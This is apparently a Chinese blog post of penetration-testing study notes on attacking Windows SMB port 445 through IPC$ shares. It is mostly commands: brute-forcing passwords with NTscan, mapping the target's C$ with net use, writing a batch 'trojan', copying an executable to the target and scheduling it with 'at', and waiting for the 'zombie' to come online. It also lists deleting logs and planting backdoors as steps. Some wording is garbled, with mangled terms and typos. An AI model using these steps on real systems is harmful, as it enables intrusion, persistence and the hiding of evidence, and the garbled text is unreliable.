渗透测试(445端口)

渗透测试(445端口)笔记由于太困,文章涉及的软件想要私聊(其实网上都有,想找都能找到)1.授权2.信息收集(nslookupwhois)3.扫描漏洞​ namp扫描IP范围端口80{IIS,apache,什么网站,软件 漏洞})scanpot软件扫描;​ 高级扫描:如IIS漏洞2003-iis6.02008iis7.0​ 扫描网站漏洞(十大网站漏洞)4.漏洞利用5.提权(shell环境命令控制权,桌面环境,最高权限)=======删库跑路6.毁尸灭迹(删除日志)7.留后门8.

笔记

由于太困,文章涉及的软件想要私聊(其实网上都有,想找都能找到)
还有有的软件下载谷歌浏览器权限不足(这个问题我也不知道是不是叫这个)
解决:谷歌里面安装迅雷插件,或者换个浏览器下载或者复制下载连接在迅雷里面下载;
太困了,明天再写吧!1!!!

1.授权

2.信息收集(nslookup whois)

3.扫描漏洞

​ namp扫描IP 范围 端口 80 {IIS,apache,什么网站,软件 漏洞})scanpot软件扫描;

​ 高级扫描:如IIS漏洞 2003-iis6.0 2008iis7.0

​ 扫描网站漏洞(十大网站漏洞 )

4.漏洞利用

5.提权(shell环境命令控制权,桌面环境,最高权限)

=======删库跑路

6.毁尸灭迹(删除日志)

7.留后门

8.渗透测试报告(漏洞,端口)=》安全加固方案

手工测试端口号开放:

​ telnet IP地址 测试端口

映射共享文件夹,在本地电脑F盘

net use f: \10.1.1.2\share ROOT /user:administrator

net use f: \10.1.1.2\share /del

md 文件夹(创建文件夹)

w漏洞利用之IPC$:

net use f: \10.1.1.2\share 密码 /user:用户名

net use f: /del

net use * /del

net use f: \10.1.1.2\c$ 密码 /user:用户名

net use f: \10.1.1.2\ipc$ 密码 /user:用户名

暴力激活成功教程系统密码之445:

445漏洞利用之一IPC$:

1、scanport 扫描445端口

2、进行暴力激活成功教程:NTscan

net use f: \10.1.1.2\ipc$ 密码 /user:用户名

net use f: \10.1.1.2\share 密码 /user:用户
net use * /del
net use * /del

net use f: \10.1.1.2\c$ 密码 /user:用户名

4、制作木马

copy con haha.bat

shutdown -s -t 100

^z

拷贝在f:盘

copy haha.bat f:

5、植入木马(留后门)

copy d:\heihei.exe \10.1.1.2\c$
6、设计计划任务自动执行木马:

net time \10.1,1.2
at \10.1.1.2 11:11 “c:\heihei.exe”
7、等待肉鸡上线

参考文献:
千锋教育(https://www.bilibili.com/video/BV1i7411G7vm)

今天的文章渗透测试(445端口)分享到此就结束了,感谢您的阅读,如果确实帮到您,您可以动动手指转发给其他人。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/25822.html

(0)
编程小号编程小号

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注